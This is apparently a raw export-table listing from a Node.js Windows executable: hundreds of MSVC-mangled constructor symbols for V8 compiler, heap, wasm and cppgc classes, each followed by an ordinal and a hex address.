                                                                                                                                                                                                                                    ??0Inspectable@V8InspectorSession@v8_inspector@@QEAA@AEBV012@@Z6730x1404e3f90
                                                                                                                                                                                                                                    ??0Inspectable@V8InspectorSession@v8_inspector@@QEAA@XZ6740x1404e3f90
                                                                                                                                                                                                                                    ??0InstantiationResultResolver@wasm@internal@v8@@QEAA@AEBV0123@@Z6750x140617f10
                                                                                                                                                                                                                                    ??0InstantiationResultResolver@wasm@internal@v8@@QEAA@XZ6760x140617f10
                                                                                                                                                                                                                                    ??0Instruction@compiler@internal@v8@@AEAA@I@Z6770x14102ceb0
                                                                                                                                                                                                                                    ??0Instruction@compiler@internal@v8@@AEAA@I_KPEAVInstructionOperand@123@0101@Z6780x14102ced0
                                                                                                                                                                                                                                    ??0InstructionBlock@compiler@internal@v8@@QEAA@$$QEAV0123@@Z6790x14057dab0
                                                                                                                                                                                                                                    ??0InstructionBlock@compiler@internal@v8@@QEAA@AEBV0123@@Z6800x14057dc00
                                                                                                                                                                                                                                    ??0InstructionBlock@compiler@internal@v8@@QEAA@PEAVZone@23@VRpoNumber@123@111_N2@Z6810x14102cfb0
                                                                                                                                                                                                                                    ??0InstructionOperand@compiler@internal@v8@@IEAA@W4Kind@0123@@Z6820x14057dd80
                                                                                                                                                                                                                                    ??0InstructionOperand@compiler@internal@v8@@QEAA@XZ6830x14010d5b0
                                                                                                                                                                                                                                    ??0InstructionScheduler@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVInstructionSequence@123@@Z6840x1410dc750
                                                                                                                                                                                                                                    ??0InstructionSelector@compiler@internal@v8@@QEAA@$$QEAV0123@@Z6850x140583d30
                                                                                                                                                                                                                                    ??0InstructionSelector@compiler@internal@v8@@QEAA@AEBV0123@@Z6860x1405842b0
                                                                                                                                                                                                                                    ??0InstructionSelector@compiler@internal@v8@@QEAA@PEAVZone@23@_KPEAVLinkage@123@PEAVInstructionSequence@123@PEAVSchedule@123@PEAVSourcePositionTable@123@PEAVFrame@123@W4EnableSwitchJumpTable@0123@PEAVTickCounter@23@PEAVJSHeapBroker@123@PEA_KPEA_KW4SourcePositionMode@0123@VFeatures@0123@W4EnableScheduling@0123@W4EnableRootsRelativeAddressing@0123@W4EnableTraceTurboJson@0123@@Z6870x14105acc0
                                                                                                                                                                                                                                    ??0InstructionSequence@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVZone@23@PEAV?$ZoneVector@PEAVInstructionBlock@compiler@internal@v8@@@23@@Z6880x14102d030
                                                                                                                                                                                                                                    ??0Int64Lowering@compiler@internal@v8@@QEAA@$$QEAV0123@@Z6890x141070b50
                                                                                                                                                                                                                                    ??0Int64Lowering@compiler@internal@v8@@QEAA@PEAVGraph@123@PEAVMachineOperatorBuilder@123@PEAVCommonOperatorBuilder@123@PEAVSimplifiedOperatorBuilder@123@PEAVZone@23@PEAV?$Signature@W4MachineRepresentation@internal@v8@@@23@V?$unique_ptr@UInt64LoweringSpecialCase@compiler@internal@v8@@U?$default_delete@UInt64LoweringSpecialCase@compiler@internal@v8@@@std@@@std@@@Z6900x1410f02e0
                                                                                                                                                                                                                                    ??0Int64LoweringSpecialCase@compiler@internal@v8@@QEAA@$$QEAU0123@@Z6910x140537950
                                                                                                                                                                                                                                    ??0Int64LoweringSpecialCase@compiler@internal@v8@@QEAA@AEBU0123@@Z6920x140537a30
                                                                                                                                                                                                                                    ??0Int64LoweringSpecialCase@compiler@internal@v8@@QEAA@XZ6930x140537ac0
                                                                                                                                                                                                                                    ??0InterpreterDispatchDescriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z6940x14057d2a0
                                                                                                                                                                                                                                    ??0InterpreterDispatchDescriptor@internal@v8@@QEAA@XZ6950x14057dd90
                                                                                                                                                                                                                                    ??0InterruptsScope@internal@v8@@QEAA@PEAVIsolate@12@_JW4Mode@012@@Z6960x140b74910
                                                                                                                                                                                                                                    ??0InvalidatedSlotsCleanup@internal@v8@@QEAA@$$QEAV012@@Z6970x140537320
                                                                                                                                                                                                                                    ??0InvalidatedSlotsCleanup@internal@v8@@QEAA@AEBV012@@Z6980x1405373b0
                                                                                                                                                                                                                                    ??0InvalidatedSlotsCleanup@internal@v8@@QEAA@PEAVMemoryChunk@12@PEAV?$set@VHeapObject@internal@v8@@UComparer@Object@23@V?$allocator@VHeapObject@internal@v8@@@std@@@std@@@Z6990x140af46b0
                                                                                                                                                                                                                                    ??0InvalidatedSlotsFilter@internal@v8@@AEAA@PEAVMemoryChunk@12@PEAV?$set@VHeapObject@internal@v8@@UComparer@Object@23@V?$allocator@VHeapObject@internal@v8@@@std@@@std@@W4RememberedSetType@12@@Z7000x140af4750
                                                                                                                                                                                                                                    ??0InvalidatedSlotsFilter@internal@v8@@QEAA@$$QEAV012@@Z7010x140537440
                                                                                                                                                                                                                                    ??0InvalidatedSlotsFilter@internal@v8@@QEAA@AEBV012@@Z7020x1405374d0
                                                                                                                                                                                                                                    ??0Isolate@internal@v8@@AEAA@V?$unique_ptr@VIsolateAllocator@internal@v8@@U?$default_delete@VIsolateAllocator@internal@v8@@@std@@@std@@_N@Z7030x140b61a70
                                                                                                                                                                                                                                    ??0IsolateAllocator@internal@v8@@QEAA@XZ7040x140a64a10
                                                                                                                                                                                                                                    ??0IsolatePlatformDelegate@node@@QEAA@$$QEAV01@@Z7050x140098720
                                                                                                                                                                                                                                    ??0IsolatePlatformDelegate@node@@QEAA@AEBV01@@Z7060x140098720
                                                                                                                                                                                                                                    ??0IsolatePlatformDelegate@node@@QEAA@XZ7070x140098720
                                                                                                                                                                                                                                    ??0Iterator@Script@internal@v8@@QEAA@PEAVIsolate@23@@Z7080x140903ff0
                                                                                                                                                                                                                                    ??0JSCallReducer@compiler@internal@v8@@QEAA@$$QEAV0123@@Z7090x141091ca0
                                                                                                                                                                                                                                    ??0JSCallReducer@compiler@internal@v8@@QEAA@AEBV0123@@Z7100x141091e10
                                                                                                                                                                                                                                    ??0JSCallReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@PEAVZone@23@V?$Flags@W4Flag@JSCallReducer@compiler@internal@v8@@H@base@3@@Z7110x141091fb0
                                                                                                                                                                                                                                    ??0JSContextSpecialization@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@V?$Maybe@UOuterContext@compiler@internal@v8@@@3@V?$MaybeHandle@VJSFunction@internal@v8@@@23@@Z7120x141092020
                                                                                                                                                                                                                                    ??0JSCreateLowering@compiler@internal@v8@@QEAA@AEBV0123@@Z7130x141092060
                                                                                                                                                                                                                                    ??0JSCreateLowering@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVCompilationDependencies@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@PEAVZone@23@@Z7140x1410920a0
                                                                                                                                                                                                                                    ??0JSFunctionBuilder@Factory@internal@v8@@QEAA@PEAVIsolate@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VContext@internal@v8@@@23@@Z7150x140b20490
                                                                                                                                                                                                                                    ??0JSFunctionRef@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVObjectData@123@_N@Z7160x14057dda0
                                                                                                                                                                                                                                    ??0JSGraph@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVGraph@123@PEAVCommonOperatorBuilder@123@PEAVJSOperatorBuilder@123@PEAVSimplifiedOperatorBuilder@123@PEAVMachineOperatorBuilder@123@@Z7170x14105b170
                                                                                                                                                                                                                                    ??0JSGraphAssembler@compiler@internal@v8@@QEAA@$$QEAV0123@@Z7180x141070cb0
                                                                                                                                                                                                                                    ??0JSGraphAssembler@compiler@internal@v8@@QEAA@AEBV0123@@Z7190x141070cb0
                                                                                                                                                                                                                                    ??0JSGraphAssembler@compiler@internal@v8@@QEAA@PEAVJSGraph@123@PEAVZone@23@V?$Optional@V?$function@$$A6AXPEAVNode@compiler@internal@v8@@@Z@std@@@base@3@_N@Z7200x141070d00
                                                                                                                                                                                                                                    ??0JSHeapBroker@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVZone@23@@Z7210x141013c60
                                                                                                                                                                                                                                    ??0JSHeapBroker@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVZone@23@_NW4CodeKind@23@@Z7220x1410b5e80
                                                                                                                                                                                                                                    ??0JSIntrinsicLowering@compiler@internal@v8@@QEAA@AEBV0123@@Z7230x141092230
                                                                                                                                                                                                                                    ??0JSIntrinsicLowering@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@@Z7240x14119b0e0
                                                                                                                                                                                                                                    ??0JSNativeContextSpecialization@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@V?$Flags@W4Flag@JSNativeContextSpecialization@compiler@internal@v8@@H@base@3@PEAVCompilationDependencies@123@PEAVZone@23@5@Z7250x14119db80
                                                                                                                                                                                                                                    ??0JSOperatorBuilder@compiler@internal@v8@@QEAA@PEAVZone@23@@Z7260x1410c1070
                                                                                                                                                                                                                                    ??0JSToWasmWrapperCompilationUnit@wasm@internal@v8@@QEAA@PEAVIsolate@23@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@PEBUWasmModule@123@_NAEBVWasmFeatures@123@W4AllowGeneric@0123@@Z7270x1406bbce0
                                                                                                                                                                                                                                    ??0JSTypedLowering@compiler@internal@v8@@QEAA@AEBV0123@@Z7280x141092260
                                                                                                                                                                                                                                    ??0JSTypedLowering@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@PEAVZone@23@@Z7290x1411ac2a0
                                                                                                                                                                                                                                    ??0JumpTableAssembler@wasm@internal@v8@@AEAA@_KH@Z7300x140623620
                                                                                                                                                                                                                                    ??0JumpTableTargetOffsets@interpreter@internal@v8@@QEAA@PEBVBytecodeArrayIterator@123@HHH@Z7310x140a533a0
                                                                                                                                                                                                                                    ??0LargeObjectSpace@internal@v8@@IEAA@PEAVHeap@12@W4AllocationSpace@12@@Z7320x140af2b60
                                                                                                                                                                                                                                    ??0LargePage@internal@cppgc@@AEAA@AEAVHeapBase@12@AEAVBaseSpace@12@_K@Z7330x14051a080
                                                                                                                                                                                                                                    ??0LargePageMemoryRegion@internal@cppgc@@QEAA@AEAVPageAllocator@v8@@AEAVFatalOutOfMemoryHandler@12@_K@Z7340x14050ccb0
                                                                                                                                                                                                                                    ??0LargePageSpace@internal@cppgc@@QEAA@PEAVRawHeap@12@_K@Z7350x140519ba0
                                                                                                                                                                                                                                    ??0LazilyGeneratedNames@wasm@internal@v8@@QEAA@XZ7360x140537560
                                                                                                                                                                                                                                    ??0LazyCompileDispatcher@internal@v8@@QEAA@PEAVIsolate@12@PEAVPlatform@2@_K@Z7370x140bd87c0
                                                                                                                                                                                                                                    ??0Linkage@compiler@internal@v8@@QEAA@PEAVCallDescriptor@123@@Z7380x140097ad0
                                                                                                                                                                                                                                    ??0LiveRange@compiler@internal@v8@@AEAA@HW4MachineRepresentation@23@PEAVTopLevelLiveRange@123@@Z7390x1411061f0
                                                                                                                                                                                                                                    ??0LoadElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVZone@23@@Z7400x1410922b0
                                                                                                                                                                                                                                    ??0Local@MarkingWorklists@internal@v8@@QEAA@PEAV123@V?$unique_ptr@VCppMarkingState@internal@v8@@U?$default_delete@VCppMarkingState@internal@v8@@@std@@@std@@@Z7410x140abe530
                                                                                                                                                                                                                                    ??0LocalAllocationBuffer@internal@v8@@AEAA@PEAVHeap@12@VLinearAllocationArea@12@@Z7420x140a9ba80
                                                                                                                                                                                                                                    ??0LocalAllocationBuffer@internal@v8@@QEAA@$$QEAV012@@Z7430x140a9baa0
                                                                                                                                                                                                                                    ??0LocalDeclEncoder@wasm@internal@v8@@QEAA@$$QEAV0123@@Z7440x1406326b0
                                                                                                                                                                                                                                    ??0LocalDeclEncoder@wasm@internal@v8@@QEAA@AEBV0123@@Z7450x140632700
                                                                                                                                                                                                                                    ??0LocalDeclEncoder@wasm@internal@v8@@QEAA@PEAVZone@23@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@@Z7460x1406327e0
                                                                                                                                                                                                                                    ??0LocalEmbedderHeapTracer@internal@v8@@QEAA@PEAVIsolate@12@@Z7470x140a97a50
                                                                                                                                                                                                                                    ??0LocalFactory@internal@v8@@QEAA@PEAVIsolate@12@@Z7480x140af2a00
                                                                                                                                                                                                                                    ??0LocalHeap@internal@v8@@QEAA@PEAVHeap@12@W4ThreadKind@12@V?$unique_ptr@VPersistentHandles@internal@v8@@U?$default_delete@VPersistentHandles@internal@v8@@@std@@@std@@@Z7490x140af1760
                                                                                                                                                                                                                                    ??0LocalIsolate@internal@v8@@QEAA@PEAVIsolate@12@W4ThreadKind@12@@Z7500x140b5fda0
                                                                                                                                                                                                                                    ??0Location@debug@v8@@QEAA@HH@Z7510x140bc8440
                                                                                                                                                                                                                                    ??0Location@debug@v8@@QEAA@XZ7520x140bc8450
                                                                                                                                                                                                                                    ??0Location@v8@@QEAA@HH@Z7530x140097a80
                                                                                                                                                                                                                                    ??0Locker@v8@@QEAA@PEAVIsolate@1@@Z7540x140098430
                                                                                                                                                                                                                                    ??0LongTaskStats@metrics@v8@@QEAA@XZ7550x140537580
                                                                                                                                                                                                                                    ??0LookupIterator@internal@v8@@AEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@V?$Handle@VName@internal@v8@@@12@V?$Handle@VMap@internal@v8@@@12@VPropertyDetails@12@_N@Z7560x140932c90
                                                                                                                                                                                                                                    ??0LookupIterator@internal@v8@@AEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@V?$Handle@VName@internal@v8@@@12@_K1W4Configuration@012@@Z7570x1405375a0
                                                                                                                                                                                                                                    ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@AEBVPropertyKey@12@1W4Configuration@012@@Z7580x140537750
                                                                                                                                                                                                                                    ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@AEBVPropertyKey@12@W4Configuration@012@@Z7590x140537790
                                                                                                                                                                                                                                    ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@V?$Handle@VName@internal@v8@@@12@1W4Configuration@012@@Z7600x1405377c0
                                                                                                                                                                                                                                    ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@V?$Handle@VName@internal@v8@@@12@W4Configuration@012@@Z7610x140537800
                                                                                                                                                                                                                                    ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@_K1W4Configuration@012@@Z7620x140537830
                                                                                                                                                                                                                                    ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@_KW4Configuration@012@@Z7630x140537870
                                                                                                                                                                                                                                    ??0LoopBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVAstNode@23@@Z7640x140a32890
                                                                                                                                                                                                                                    ??0LoopInfo@compiler@internal@v8@@QEAA@$$QEAU0123@@Z7650x14111a980
                                                                                                                                                                                                                                    ??0LoopInfo@compiler@internal@v8@@QEAA@AEBU0123@@Z7660x14111a9d0
                                                                                                                                                                                                                                    ??0LoopInfo@compiler@internal@v8@@QEAA@HHHPEAVZone@23@@Z7670x14111aad0
                                                                                                                                                                                                                                    ??0LoopPeeler@compiler@internal@v8@@QEAA@PEAVGraph@123@PEAVCommonOperatorBuilder@123@PEAVLoopTree@123@PEAVZone@23@PEAVSourcePositionTable@123@PEAVNodeOriginTable@123@@Z7680x1410922e0
                                                                                                                                                                                                                                    ??0MachineGraph@compiler@internal@v8@@QEAA@PEAVGraph@123@PEAVCommonOperatorBuilder@123@PEAVMachineOperatorBuilder@123@@Z7690x14105b2c0
                                                                                                                                                                                                                                    ??0MachineOperatorBuilder@compiler@internal@v8@@QEAA@PEAVZone@23@W4MachineRepresentation@23@V?$Flags@W4Flag@MachineOperatorBuilder@compiler@internal@v8@@I@base@3@VAlignmentRequirements@0123@@Z7700x141040c90
                                                                                                                                                                                                                                    ??0MachineOperatorReducer@compiler@internal@v8@@QEAA@AEBV0123@@Z7710x141092310
                                                                                                                                                                                                                                    ??0MachineOperatorReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVMachineGraph@123@_N@Z7720x1411cab90
                                                                                                                                                                                                                                    ??0MacroAssembler@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z7730x1405590e0
                                                                                                                                                                                                                                    ??0MacroAssembler@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z7740x140559140
                                                                                                                                                                                                                                    ??0MapRef@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVObjectData@123@_N@Z7750x14057de00
                                                                                                                                                                                                                                    ??0MapUpdater@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VMap@internal@v8@@@12@@Z7760x14092d160
                                                                                                                                                                                                                                    ??0Marker@internal@cppgc@@QEAA@AEAVHeapBase@12@PEAVPlatform@2@UMarkingConfig@MarkerBase@12@@Z7770x140512280
                                                                                                                                                                                                                                    ??0MarkerBase@internal@cppgc@@IEAA@AEAVHeapBase@12@PEAVPlatform@2@UMarkingConfig@012@@Z7780x140512370
                                                                                                                                                                                                                                    ??0MarkingVerifier@internal@cppgc@@QEAA@AEAVHeapBase@12@W4CollectionType@MarkingConfig@MarkerBase@12@@Z7790x14050fd60
                                                                                                                                                                                                                                    ??0MarkingVerifierBase@internal@cppgc@@IEAA@AEAVHeapBase@12@W4CollectionType@MarkingConfig@MarkerBase@12@AEAVVerificationState@12@V?$unique_ptr@VVisitor@cppgc@@U?$default_delete@VVisitor@cppgc@@@std@@@std@@@Z7800x14050fe00
                                                                                                                                                                                                                                    ??0MarkingVisitorBase@internal@cppgc@@QEAA@AEAVHeapBase@12@AEAVBasicMarkingState@12@@Z7810x14050f200
                                                                                                                                                                                                                                    ??0MarkingWorklists@internal@v8@@QEAA@XZ7820x1405378a0
                                                                                                                                                                                                                                    ??0MeasureMemoryDelegate@internal@v8@@QEAA@AEBV012@@Z7830x140ab9760
                                                                                                                                                                                                                                    ??0MeasureMemoryDelegate@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VNativeContext@internal@v8@@@12@V?$Handle@VJSPromise@internal@v8@@@12@W4MeasureMemoryMode@2@@Z7840x140ab9790
                                                                                                                                                                                                                                    ??0MeasureMemoryDelegate@v8@@QEAA@AEBV01@@Z7850x140097db0
                                                                                                                                                                                                                                    ??0MeasureMemoryDelegate@v8@@QEAA@XZ7860x140097db0
                                                                                                                                                                                                                                    ??0MemoryAllocator@internal@v8@@QEAA@PEAVIsolate@12@PEAVPageAllocator@2@_K@Z7870x140abc560
                                                                                                                                                                                                                                    ??0MemoryMappedFile@OS@base@v8@@QEAA@AEBV0123@@Z7880x140ff0f90
                                                                                                                                                                                                                                    ??0MemoryMappedFile@OS@base@v8@@QEAA@XZ7890x140ff0f90
                                                                                                                                                                                                                                    ??0MemoryReducer@internal@v8@@QEAA@PEAVHeap@12@@Z7900x140ab8f00
                                                                                                                                                                                                                                    ??0MemoryRegion@internal@cppgc@@QEAA@PEAE_K@Z7910x140504370
                                                                                                                                                                                                                                    ??0MemoryRegion@internal@cppgc@@QEAA@XZ7920x140097c90
                                                                                                                                                                                                                                    ??0MessageLocation@internal@v8@@QEAA@V?$Handle@VScript@internal@v8@@@12@HH@Z7930x140b5a9a0
                                                                                                                                                                                                                                    ??0MessageLocation@internal@v8@@QEAA@V?$Handle@VScript@internal@v8@@@12@HHV?$Handle@VSharedFunctionInfo@internal@v8@@@12@@Z7940x140b5a9c0
                                                                                                                                                                                                                                    ??0MessageLocation@internal@v8@@QEAA@V?$Handle@VScript@internal@v8@@@12@V?$Handle@VSharedFunctionInfo@internal@v8@@@12@H@Z7950x140b5a9e0
                                                                                                                                                                                                                                    ??0MessageLocation@internal@v8@@QEAA@XZ7960x140b5aa00
                                                                                                                                                                                                                                    ??0MicrotaskQueue@internal@v8@@AEAA@XZ7970x140b59d30
                                                                                                                                                                                                                                    ??0MicrotaskQueue@v8@@AEAA@XZ7980x140098450
                                                                                                                                                                                                                                    ??0MicrotasksScope@v8@@QEAA@PEAVIsolate@1@PEAVMicrotaskQueue@1@W4Type@01@@Z7990x140c76b50
                                                                                                                                                                                                                                    ??0MicrotasksScope@v8@@QEAA@PEAVIsolate@1@W4Type@01@@Z8000x140c76b80
                                                                                                                                                                                                                                    ??0ModuleWireBytes@wasm@internal@v8@@QEAA@PEBE0@Z8010x140537930
                                                                                                                                                                                                                                    ??0ModuleWireBytes@wasm@internal@v8@@QEAA@V?$Vector@$$CBE@base@3@@Z8020x140097880
                                                                                                                                                                                                                                    ??0MoveOperands@compiler@internal@v8@@QEAA@AEBVInstructionOperand@123@0@Z8030x14057de60
                                                                                                                                                                                                                                    ??0MoveOptimizer@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVInstructionSequence@123@@Z8040x1410fe910
                                                                                                                                                                                                                                    ??0MultiIsolatePlatform@node@@QEAA@AEBV01@@Z8050x140098730
                                                                                                                                                                                                                                    ??0MultiIsolatePlatform@node@@QEAA@XZ8060x140098730
                                                                                                                                                                                                                                    ??0MutatorMarkingVisitor@internal@cppgc@@QEAA@AEAVHeapBase@12@AEAVMutatorMarkingState@12@@Z8070x14050f220
                                                                                                                                                                                                                                    ??0MutatorMinorGCMarkingVisitor@internal@v8@@QEAA@AEAVHeapBase@1cppgc@@AEAVMutatorMarkingState@14@AEAVUnifiedHeapMarkingState@12@@Z8080x140b3b2a0
                                                                                                                                                                                                                                    ??0MutatorMinorGCMarkingVisitor@internal@v8@@QEAA@AEBV012@@Z8090x140b3b2c0
                                                                                                                                                                                                                                    ??0MutatorUnifiedHeapMarkingVisitor@internal@v8@@QEAA@AEAVHeapBase@1cppgc@@AEAVMutatorMarkingState@14@AEAVUnifiedHeapMarkingState@12@@Z8100x140b3b2f0
                                                                                                                                                                                                                                    ??0MutatorUnifiedHeapMarkingVisitor@internal@v8@@QEAA@AEBV012@@Z8110x140b3b310
                                                                                                                                                                                                                                    ??0Mutex@base@v8@@QEAA@XZ8120x14010d5b0
                                                                                                                                                                                                                                    ??0NameConverter@disasm@@QEAA@XZ8130x1405739e0
                                                                                                                                                                                                                                    ??0NameDictionary@internal@v8@@IEAA@_K@Z8140x140097ad0
                                                                                                                                                                                                                                    ??0NameDictionary@internal@v8@@QEAA@XZ8150x14010d5b0
                                                                                                                                                                                                                                    ??0NameProvider@cppgc@@QEAA@AEBV01@@Z8160x1404e3fa0
                                                                                                                                                                                                                                    ??0NameProvider@cppgc@@QEAA@XZ8170x1404e3fa0
                                                                                                                                                                                                                                    ??0NameToIndexHashTable@internal@v8@@IEAA@_K@Z8180x140097ad0
                                                                                                                                                                                                                                    ??0NameToIndexHashTable@internal@v8@@QEAA@XZ8190x14010d5b0
                                                                                                                                                                                                                                    ??0NativeContextStats@internal@v8@@QEAA@$$QEAV012@@Z8200x140537950
                                                                                                                                                                                                                                    ??0NativeContextStats@internal@v8@@QEAA@AEBV012@@Z8210x140537a30
                                                                                                                                                                                                                                    ??0NativeContextStats@internal@v8@@QEAA@XZ8220x140537ac0
                                                                                                                                                                                                                                    ??0NativeModule@wasm@internal@v8@@AEAA@AEBVWasmFeatures@123@W4DynamicTiering@123@VVirtualMemory@23@V?$shared_ptr@$$CBUWasmModule@wasm@internal@v8@@@std@@V?$shared_ptr@VCounters@internal@v8@@@8@PEAV?$shared_ptr@VNativeModule@wasm@internal@v8@@@8@@Z8230x14065c7e0
                                                                                                                                                                                                                                    ??0NativeModuleDeserializer@wasm@internal@v8@@QEAA@PEAVNativeModule@123@@Z8240x14061c720
                                                                                                                                                                                                                                    ??0NativeModuleSerializer@wasm@internal@v8@@QEAA@PEBVNativeModule@123@V?$Vector@QEAVWasmCode@wasm@internal@v8@@@base@3@@Z8250x14061c760
                                                                                                                                                                                                                                    ??0NewSpace@internal@v8@@QEAA@PEAVHeap@12@PEAVPageAllocator@2@_K2PEAVLinearAllocationArea@12@@Z8260x140ab7040
                                                                                                                                                                                                                                    ??0NexusConfig@internal@v8@@AEAA@PEAVIsolate@12@@Z8270x14051ac10
                                                                                                                                                                                                                                    ??0NexusConfig@internal@v8@@AEAA@PEAVIsolate@12@PEAVLocalHeap@12@@Z8280x140504370
                                                                                                                                                                                                                                    ??0NoDumpOnJavascriptExecution@internal@v8@@QEAA@PEAVIsolate@12@@Z8290x140bda8b0
                                                                                                                                                                                                                                    ??0NoGarbageCollectionScope@subtle@cppgc@@QEAA@AEAVHeapHandle@2@@Z8300x14051ab10
                                                                                                                                                                                                                                    ??0NoThrowOnJavascriptExecution@internal@v8@@QEAA@PEAVIsolate@12@@Z8310x140bda8d0
                                                                                                                                                                                                                                    ??0Node@compiler@internal@v8@@AEAA@IPEBVOperator@123@HH@Z8320x14102a030
                                                                                                                                                                                                                                    ??0NodeOriginTable@compiler@internal@v8@@QEAA@PEAVGraph@123@@Z8330x1410f48c0
                                                                                                                                                                                                                                    ??0NormalPage@internal@cppgc@@AEAA@AEAVHeapBase@12@AEAVBaseSpace@12@@Z8340x14051a0a0
                                                                                                                                                                                                                                    ??0NormalPageMemoryPool@internal@cppgc@@QEAA@AEBV012@@Z8350x140504380
                                                                                                                                                                                                                                    ??0NormalPageMemoryPool@internal@cppgc@@QEAA@XZ8360x14050cd90
                                                                                                                                                                                                                                    ??0NormalPageMemoryRegion@internal@cppgc@@QEAA@AEAVPageAllocator@v8@@AEAVFatalOutOfMemoryHandler@12@@Z8370x14050cdc0
                                                                                                                                                                                                                                    ??0NormalPageSpace@internal@cppgc@@QEAA@PEAVRawHeap@12@_K_N@Z8380x140519c00
                                                                                                                                                                                                                                    ??0OFStream@internal@v8@@QEAA@PEAU_iobuf@@@Z8390x1407bab50
                                                                                                                                                                                                                                    ??0OFStreamBase@internal@v8@@QEAA@AEBV012@@Z8400x140537b30
                                                                                                                                                                                                                                    ??0OFStreamBase@internal@v8@@QEAA@PEAU_iobuf@@@Z8410x1407bac80
                                                                                                                                                                                                                                    ??0OSROptimizedCodeCache@internal@v8@@IEAA@_K@Z8420x140097ad0
                                                                                                                                                                                                                                    ??0OSROptimizedCodeCache@internal@v8@@QEAA@XZ8430x14010d5b0
                                                                                                                                                                                                                                    ??0ObjectAllocator@internal@cppgc@@QEAA@AEAVRawHeap@12@AEAVPageBackend@12@AEAVStatsCollector@12@AEAVPreFinalizerHandler@12@@Z8440x14050e1f0
                                                                                                                                                                                                                                    ??0ObjectHashSet@internal@v8@@IEAA@_K@Z8450x140097ad0
                                                                                                                                                                                                                                    ??0ObjectHashSet@internal@v8@@QEAA@XZ8460x14010d5b0
                                                                                                                                                                                                                                    ??0ObjectHashTable@internal@v8@@IEAA@_K@Z8470x140097ad0
                                                                                                                                                                                                                                    ??0ObjectHashTable@internal@v8@@QEAA@XZ8480x14010d5b0
                                                                                                                                                                                                                                    ??0ObjectIterator@internal@v8@@QEAA@AEBV012@@Z8490x140537b70
                                                                                                                                                                                                                                    ??0ObjectIterator@internal@v8@@QEAA@XZ8500x140537b70
                                                                                                                                                                                                                                    ??0ObjectRef@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVObjectData@123@_N@Z8510x14057de80
                                                                                                                                                                                                                                    ??0ObjectStartBitmap@internal@cppgc@@QEAA@PEAE@Z8520x14051a0f0
                                                                                                                                                                                                                                    ??0OldToNewRememberedSet@internal@cppgc@@QEAA@AEBVHeapBase@12@@Z8530x14050a1d0
                                                                                                                                                                                                                                    ??0Operand@internal@v8@@QEAA@PEAVLabel@12@H@Z8540x1405591a0
                                                                                                                                                                                                                                    ??0Operand@internal@v8@@QEAA@V012@H@Z8550x1405fd8d0
                                                                                                                                                                                                                                    ??0Operand@internal@v8@@QEAA@VRegister@12@0W4ScaleFactor@12@H@Z8560x1405591c0
                                                                                                                                                                                                                                    ??0Operand@internal@v8@@QEAA@VRegister@12@H@Z8570x140559250
                                                                                                                                                                                                                                    ??0Operand@internal@v8@@QEAA@VRegister@12@W4ScaleFactor@12@H@Z8580x140559320
                                                                                                                                                                                                                                    ??0OperationTyper@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVZone@23@@Z8590x141249700
                                                                                                                                                                                                                                    ??0OperationsBarrier@internal@v8@@QEAA@XZ8600x140537b80
                                                                                                                                                                                                                                    ??0Operator@compiler@internal@v8@@QEAA@GV?$Flags@W4Property@Operator@compiler@internal@v8@@E@base@3@PEBD_K22222@Z8610x1410c0650
                                                                                                                                                                                                                                    ??0OptimizedCompilationInfo@internal@v8@@QEAA@PEAVZone@12@PEAVIsolate@12@V?$Handle@VSharedFunctionInfo@internal@v8@@@12@V?$Handle@VJSFunction@internal@v8@@@12@W4CodeKind@12@@Z8620x140537bb0
